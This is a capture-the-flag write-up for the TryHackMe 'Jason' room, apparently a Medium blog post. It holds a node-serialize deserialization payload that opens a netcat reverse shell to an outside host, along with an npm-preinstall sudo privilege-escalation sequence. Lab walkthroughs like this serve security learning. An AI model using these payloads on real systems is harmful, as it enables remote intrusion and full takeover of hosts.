TryHackME: Jason

Today we will take a look at TryHackMe: Jason. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.192.78

Let’s take a look at the website.

Let’s enter something and look at the query with burp

And we see it is built with node js . I figured there would be a vulnerability related to json & node.js . So I researched a bit and found out there is a RCE vulnerability .

I have prepared such a code for operation.

{“email”:”test”,”rce”:”_$$ND_FUNC$$_function(){ require(‘child_process’).exec(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f’, function(error, stdout, stderr) { console.log(stdout) }); }()”}

Since we have to use cookies, I encrypt with base64.

Let’s paste to the cookie and listen.

When we refresh the page, we get a shell.

Privilege Escalation

Comman: sudo -l

Let’s exploit

Command: TF=$(mktemp -d)

Command: echo ‘{“scripts”: {“preinstall”: “/bin/bash”}}’ > $TF/package.json

Command: sudo /usr/bin/npm -C $TF --unsafe-perm i

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Expanding Google Analytics Data With Google Tag Manager Variables

E-commerce web application for used furniture

The Disappointing Quest for an Headless CMS in 2017

Common Reselect Gotchas

One Click Mass Email Notification using EmailJS

What Is the Difference Between map() and forEach() in JavaScript?

Merge namespace and class in typescript with webpack

Discord.js tutorial

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Day 7: Cross site scripting (XSS)

What is insecure deserialization?

1337UP live Intigriti CTF 2022